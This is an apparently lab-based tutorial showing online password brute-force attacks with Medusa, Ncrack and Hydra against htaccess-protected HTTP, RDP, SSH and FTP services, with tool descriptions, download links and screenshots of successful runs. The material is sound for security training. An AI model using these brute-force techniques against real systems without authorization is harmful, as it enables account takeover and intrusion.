ONLINE PASSWORD ATTACKS WITH MEDUSA, NCRACK AND HDYRA
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFC3xlm_nV4uFs0yWVI4txcTABlaJO2gNgFxxVmVZnMb5hDOXSjsWjubwFXU_aT5m7dm4-ZHCGtsJdmqlgLz95Dadvt36FCqDZsHq9lPUWiLLAZPukTzUtotEJeaO91kw9i-mu6DXQPawi/s1600/screenshot.10.jpg)
1 - Introduction
- Online password attacks involve password-guessing attempts for networked services that use a username and password authentication scheme.
- This includes services such as HTTP, SSH, VNC, FTP, SNMP, POP3, etc.
- In order to be able to automate a password attack against a given networked service, we must be able to generate authentication requests for the specific protocol in use by that service.
- Tools such as Medusa, Ncrack, Hydra and even Metasploit can be used for that purpose.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmeBkELQuYhLIVcj7O8H9UN3asVnfNARaYps7SDDw2_DHWOY8a2zi3IiFE7H40VR5O-b9t4JE1p4YYh_bzRFUGJByQYeW6rPNokpEl-iBlXur-jUC3xmsMrJc83hfwSDZm32QF1O7K5tD/s400/screenshot.7.jpg)
2 - Medusa for HTTP brute force attack
- Medusa is a command line speedy, massively parallel, modular, login brute-forcer, supporting services which allow remote authentication.
- Medusa supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MYSQL, NCP, NNTP, POP3, PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, VmAuthd and Telnet.
- While cracking the password, host, username and password can be flexible input while performing the attack.
- Efficiency of the tool depends on network connectivity; for instance on a local system, it can test 2000 passwords per minute.
- With Medusa it is possible to perform a parallel attack, for instance cracking passwords of a few email accounts simultaneously, specifying the username list along with the password list.
- Installation and further information here:
http://foofus.net/goons/jmk/tools/
http://foofus.net/goons/jmk/medusa/medusa.html
- In the next example Medusa is used to perform a brute force attack against an htaccess protected web directory.
- First of all, let's check that the target has got open the port 80:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS_i305hF0XzE6xruujEnOaDPGnmesaIX2ycJCNGk2bijwe5dH7TKEn4YPLeUbJAHPIBnstVrTG-ePbzqVkIZx2VkCP4Hesq2dKN2Iw8P0BYE4AbpRIW7A7h7ilIMLj7z4fTSyDJpatogW/s1600/screenshot.3.jpg)
- Launching medusa (option -T 10 means 10 threads) against the target the attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsA9kfAXDprJ9JnsbEABr8NtQ5mzX0BzWIcSDS0kNxuzjy-QGILZ7d6NMyOZ-hDjAtduzjuvu747UuK3zKrbxZDa1QLQEguEKCvb0pFmsaZxIXVH4E_xFOKMYIPfSCgcVEf63GCcySB6Q/s1600/screenshot.1.jpg)
3 - Ncrack for RDP brute force attack
- Ncrack is a high-speed network authentication cracking tool built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
- Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.
- Protocols supported by Ncrack include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, SIP, Redis, PostgreSQL, MySQL, and Telnet.
- Ncrack is available for many different platforms, including Linux, *BSD, Windows and Mac OS X. There are already installers for Windows and Mac OS X and a universal source code tarball that can be compiled on every system.
- For download and further information:
https://nmap.org/ncrack/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCDwhcaefSt7Mts1ChXjPvfQ_kxveEsAXqtLkY9iB37qWeGv45pVUwNus0yjXrQIlWxAuilhuKOSXwpRrdo50a2Z0nExzLEg4QHKMDrDgJNFO8OzqjkmMdS3JxfE1PMELai5LiU22hCG50/s1600/screenshot.6.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO6Vq0YBUWmXBmTYO0I_HlV_eToRLLDVR4wue4gcVFIn7AjfW4Qscax8oOfjb6_1yrXvbTnge3P1Rty2RlMUMlLj30Vgi_8DDkIYL-e2dizge10k2rdVf5AicazcDXw2d49A0TG7GcZc0B/s1600/screenshot.5.jpg)
4 - Hydra for SSH brute force attack
- Hydra is a fast network logon password cracking tool.
- It is available for Windows, Linux, Free BSD, Solaris and OS X, supporting many various network protocols like Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
- Download Hydra here:
https://www.thc.org/thc-hydra/
- In the next example SSH credentials are attacked with Hydra.
- Checking that the SSH service is running at port 22 of the target:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg-f74_AI_zmP_uFmYkpqOKIKjR9Fn9tVDoLkn9RYNck0tWiU_Zkv7hBXQWLfVLQYCeYTHt03bHGCAUHRNhzGw14AYiJEs0mP6A4kJQyl6i53k1fLM-N3E5Bxm_cj9qz37rDO2qR1AU5-/s1600/screenshot.4.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBQME85zc1dLko9iOBjlmoSKevyDqEmKUeB_zNQyn6zuVM5h3KidGKCI5hoJFDMlozzdrjOO6-Bxbz1jyblid48koo5FB42xy-fSCfn2m3bVVXT1o1mEuUnavEafX4kBruhTexpcEfQEU/s1600/screenshot.2.jpg)
5 - Hydra for FTP brute force attack
- This attack is similar to the previous one, with the only difference that the attacked service is FTP working at port 21:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_TDVHeEcSFBkITi67geVH4fuzaYPmIlkd4Jkr5is3KRz9NQ2Zz1EKdWOPmRtfQVRfGCidHTJm8BCfqyNgJTRTu5NuZg4G7uI0KUY2zAlmcscT69NrPKsFhY0bTRuNF3UkaJKMa_QqiezC/s1600/screenshot.1.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisSUVGS-oIKzmRFbTWIDxyk8ks8s1ooxt7M2UKzEmQwq7oilcJtvi5b9kCq6BmeNv5Hn1kp16rq5JFSn6uX_dWzMgUY7cKrJXMqBjBCXFOOaXZF3rNsmUCEyglbGswQ4yN-V2MVR1KrCHl/s1600/screenshot.2.jpg)